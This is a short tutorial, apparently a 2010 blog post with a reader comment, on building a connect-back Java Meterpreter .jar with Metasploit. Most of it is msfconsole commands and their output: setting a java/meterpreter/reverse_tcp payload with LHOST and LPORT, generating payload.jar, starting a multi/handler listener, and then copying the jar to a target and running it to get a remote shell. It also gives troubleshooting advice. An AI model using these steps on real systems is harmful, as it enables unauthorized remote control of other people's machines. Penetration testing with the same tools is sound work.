Here are some quick notes on how to create a connect-back Java Meterpreter .jar file. The process is very straightforward, simply generate the .jar, setup a handler. Then move the .jar to your target & execute it.
Note! Nightranger’s method to do this is currently out of date (10/17/2010).
Following mihi’s instructions, create the payload:
msf exploit(java_signed_applet) > use test/java_tester msf exploit(java_tester) > set PAYLOAD java/meterpreter/reverse_tcp msf exploit(java_tester) > set LHOST 10.0.0.11 msf exploit(java_tester) > set LPORT 4444 msf exploit(java_tester) > exploit [*] Started reverse handler on 10.0.0.11:4444 [*] Sending stage (26938 bytes) to 10.0.0.11 [*] Meterpreter session 1 opened (10.0.0.11:4444 -> 10.0.0.11:60519) at 2010-10-17 17:50:29 -0500 ^C [*] Exploit completed, but no session was created. msf exploit(java_tester) > [*] Meterpreter session 1 closed. Reason: Died msf exploit(java_tester) > ls payload.jar
now, set up the handler:
msf exploit(java_tester) > use exploit/multi/handler msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 10.0.0.11 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > exploit -j [*] Exploit running as background job.
copy the payload to the target & run it, and you’re golden. no need to fiddle with classpath or anything, the loader jar is self-contained.
Eventually you’ll be able to build the jar with msfpayload or by using the payload in msfconsole.
I tried it with Win 7 & Win XP targets, with new Java and with one a year old, it never completes, just hangs at “Sending stage (749056 bytes) to 192.168.1.81.
I can use the Adobe Cooltype exploit but the JAR one doesn’t work. I am using BackTrack 4 in VMware Workstation.
make sure to use the java/meterpreter/reverse_tcp payload, and not windows/meterpreter/reverse_tcp
note: test modules need to be loaded in now:
msf exploit(psexec) > loadpath /home/jcran/framework/test/modules